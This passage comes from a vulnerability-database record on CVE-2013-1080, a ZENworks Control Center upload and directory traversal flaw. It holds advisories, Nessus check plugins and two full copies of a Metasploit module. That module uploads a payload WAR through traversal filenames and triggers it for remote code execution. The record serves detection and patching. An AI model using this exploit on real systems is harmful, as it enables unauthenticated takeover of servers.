value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n 
'../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. 
I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "naslFamily": "CGI abuses", "pluginID": "66914", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:01", "bulletinFamily": "NVD", "description": "The web server in Novell ZENworks Configuration Management (ZCM) 10.3 and 11.2 before 11.2.4 does not properly perform authentication for zenworks/jsp/index.jsp, which allows remote attackers to conduct directory traversal attacks, and consequently upload and execute arbitrary programs, via a request to TCP port 443.", "modified": "2013-12-13T05:12:00", "id": "CVE-2013-1080", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1080", "published": "2013-03-29T16:09:00", "title": "CVE-2013-1080", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. \n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). 
\n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "id": "SAINT:94F8E6CAEFFA04E9B0850B791E66098C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "title": "Novell ZENworks Control Center file upload vulnerability", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. \n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). 
\n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "id": "SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "type": "saint", "title": "Novell ZENworks Control Center file upload vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. 
\n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "id": "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "type": "saint", "title": "Novell ZENworks Control Center file upload vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:32", "bulletinFamily": "exploit", "description": "", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/121042/Novell-ZENworks-Configuration-Management-Remote-Execution.html", "id": "PACKETSTORM:121042", "type": "packetstorm", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell ZENworks Configuration Management Remote Execution', \n'Description' => %q{ \nThis module exploits a code execution flaw in Novell ZENworks Configuration \nManagement 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control \nCenter application, allowing an unauthenticated attacker to upload a malicious file \noutside of the TEMP directory and then make a second request that allows for \narbitrary code execution. This module has been tested successfully on Novell \nZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE \nLinux Enterprise Server 10 SP3. \n}, \n'Author' => \n[ \n'James Burton', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-1080' ], \n[ 'BID', '58668' ], \n[ 'OSVDB', '91627' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ], \n[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ] \n], \n'Privileged' => false, \n'Platform' => [ 'win', 'linux' ], \n'Targets' => \n[ \n[ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'Traversal' => '../webapps/' \n} \n], \n[ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/' \n} \n] \n], \n'DefaultTarget' => 1, \n'DisclosureDate' => 'Mar 22 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]) \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ 
\n'method' => 'GET', \n'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\" \n}) \n \nif res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/ \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \ndef exploit \n \n# Generate the WAR containing the EXE containing the payload \napp_base = rand_text_alphanumeric(4+rand(4)) \njsp_name = rand_text_alphanumeric(8+rand(8)) \n \nwar_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s \n \nprint_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\") \n \n# Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars \nboundary = \"----#{rand_text_alpha(34)}\" \ndata = \"--#{boundary}\\r\\n\" \ndata << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\" \ndata << \"Content-Type: application/octet-stream\\r\\n\\r\\n\" \ndata << war_data \ndata << \"\\r\\n\" \ndata << \"--#{boundary}--\" \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\", \n'ctype' => \"multipart/form-data; boundary=#{boundary}\", \n'data' => data \n}) \n \nif res and res.code == 302 \nprint_status(\"Upload finished, waiting 20 seconds for payload deployment...\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to upload payload\") \nend \n \n# Wait to ensure the uploaded war is deployed \nselect(nil, nil, nil, 20) \n \nprint_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"), \n'method' => 'GET', \n}) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121042/zenworks_control_center_upload.rb.txt"}], "d2": [{"lastseen": "2019-05-29T19:19:05", 
"bulletinFamily": "exploit", "description": "**Name**| d2sec_zcm2 \n---|--- \n**CVE**| CVE-2013-1080 \n**Exploit Pack**| [D2ExploitPack](<http://www.d2sec.com/products.htm>) \n**Description**| Novell ZENWorks Configuration Management Arbitrary File Upload Remote Code Execution Vulnerability \n**Notes**| \n", "modified": "2013-03-29T16:09:00", "published": "2013-03-29T16:09:00", "id": "D2SEC_ZCM2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_zcm2", "title": "DSquare Exploit Pack: D2SEC_ZCM2", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2016-11-09T00:18:15", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENworks. Authentication is not required to exploit this vulnerability. \n\nThe specific issue exists within ZENworks Control Center, which listens on tcp/443 by default. Insufficient authentication checking on /zenworks/jsp/index.jsp allows a remote attacker to upload files to the webserver. 
By combining this with a directory traversal vulnerability, an attacker can exploit this condition to gain remote code execution as SYSTEM.", "modified": "2013-11-09T00:00:00", "published": "2013-03-22T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-049", "id": "ZDI-13-049", "title": "Novell ZENworks Control Center File Upload Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T03:00:24", "bulletinFamily": "scanner", "description": "The installed version of Novell ZENworks Control Center has a flaw\nwith authentication checking on ", "modified": "2019-11-02T00:00:00", "id": "NOVELL_ZCC_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/65722", "published": "2013-03-28T00:00:00", "title": "Novell ZENworks Control Center File Upload Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65722);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution\");\n script_summary(english:\"Checks for interim fix\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw\nwith authentication checking on '/zenworks/jsp/index.jsp' that can\nallow a remote, unauthenticated attacker to upload arbitrary files and\nexecute them with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"novell_zenworks_detect.nasl\");\n script_require_keys(\"SMB/Novell/ZENworks/Installed\");\n script_require_ports(139, 445);\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"bsal.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"zip.inc\");\ninclude(\"obj.inc\");\n\nget_kb_item_or_exit(\"SMB/Novell/ZENworks/Installed\");\n\n# Get details of the ZCM install.\npath = get_kb_item_or_exit(\"SMB/Novell/ZENworks/Path\");\nver = get_kb_item_or_exit(\"SMB/Novell/ZENworks/Version\");\n\nvuln = FALSE;\n\n# 10.3.x is vuln\n# 11.2.x is vuln\nif (ver =~ \"^10\\.3($|\\.)\" ||\n ver =~ \"^11\\.2\\.[01]($|\\.)\")\n vuln = TRUE;\n\nif (ver =~ \"^11\\.2\\.3($|\\.)\")\n{\n # fixed in 11.2.3a MU 1\n if(ver_compare(ver:ver, fix:\"11.2.3.24691\", strict:FALSE) == -1)\n vuln = TRUE;\n}\n\n# check if interim fix has been applied\nif (ver =~ \"^11\\.2\\.2($|\\.)\")\n{\n jar_file_raw_path = path;\n if (path[strlen(path)-1] != '\\\\') jar_file_raw_path += '\\\\';\n jar_file_raw_path += \"share\\tomcat\\webapps\\zenworks\\WEB-INF\\lib\\njwc.jar\";\n jar_file = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\",\n string:jar_file_raw_path);\n\n share = hotfix_path2share(path: path);\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:jar_file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n if (isnull(fh))\n {\n NetUseDel();\n exit(1, \"Unable to open '\" + jar_file_raw_path + \"'.\");\n }\n\n res = zip_parse(smb:fh);\n\n # cleanup\n CloseFile(handle:fh);\n NetUseDel();\n\n if (isnull(res))\n exit(1, \"Error while trying to extract '\" + jar_file_raw_path + \"'.\");\n\n if (isnull(res[\"files\"][\"com/novell/web/util/ValidateDateUtil.class\"][\"timestamp\"]))\n exit(1, \"Jar file missing information for 'com/novell/web/util/ValidateDateUtil.class'.\");\n\n timestamp = res[\"files\"][\"com/novell/web/util/ValidateDateUtil.class\"][\"timestamp\"];\n # msdos format yyyy-mm-dd hh:mm:ss - we are only interested in date portion\n item = eregmatch(pattern: \"^(\\d{4})-(\\d{2})-(\\d{2}) \", string:timestamp);\n if (isnull(item))\n exit(1, \"Error parsing timestamp on 'com/novell/web/util/ValidateDateUtil.class'.\");\n\n year = int(item[1]);\n month = int(item[2]);\n day = int(item[3]);\n\n # patch modified date: 3/5/2013\n # check to see if patch has been applied\n if (\n year < 2013 ||\n (year == 2013 && month < 3) ||\n (year == 2013 && month == 3 && day < 5)\n ) vuln = TRUE;\n}\n\nif (ver =~ \"^11\\.2\\.3($|\\.)\")\n fix = \"11.2.3a Monthly Update 1\";\nelse\n fix = \"11.2.2 with interim fix\";\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:kb_smb_transport(), extra:report);\n }\n else security_hole(kb_smb_transport());\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Novell ZENworks\", ver, path);\n", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-05T05:35:45", "bulletinFamily": "exploit", "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.\n", "modified": "2017-09-08T01:18:50", "published": "2013-03-30T18:35:04", "id": "MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD", "href": "", "type": "metasploit", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\n 'Description' => %q{\n This module exploits a code execution flaw in Novell ZENworks Configuration\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control\n Center application, allowing an unauthenticated attacker to upload a malicious file\n outside of the TEMP directory and then make a second request that allows for\n arbitrary code execution. 
This module has been tested successfully on Novell\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\n Linux Enterprise Server 10 SP3.\n },\n 'Author' =>\n [\n 'James Burton', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-1080' ],\n [ 'BID', '58668' ],\n [ 'OSVDB', '91627' ],\n [ 'ZDI', '13-049' ],\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\n ],\n 'Privileged' => false,\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'Traversal' => '../webapps/'\n }\n ],\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => 'Mar 22 2013'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\n })\n\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n\n # Generate the WAR containing the EXE containing the payload\n app_base = rand_text_alphanumeric(4+rand(4))\n jsp_name = rand_text_alphanumeric(8+rand(8))\n\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\n\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\n\n # Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars\n boundary = \"----#{rand_text_alpha(34)}\"\n data = \"--#{boundary}\\r\\n\"\n data << \"Content-Disposition: form-data; 
name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\n data << war_data\n data << \"\\r\\n\"\n data << \"--#{boundary}--\"\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => data\n })\n\n if res and res.code == 302\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\n else\n fail_with(Failure::Unknown, \"Failed to upload payload\")\n end\n\n # Wait to ensure the uploaded war is deployed\n select(nil, nil, nil, 20)\n\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\n send_request_cgi({\n 'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"),\n 'method' => 'GET',\n })\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/zenworks_control_center_upload.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "File upload vulnerability in Novell ZENworks Configuration Management\n\nVulnerability Type: File Upload", "modified": "2013-04-02T00:00:00", "published": "2013-04-30T00:00:00", "id": "E-318", "href": "", "type": "dsquare", "title": "Novell ZENworks Configuration Management 11 SP2 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": 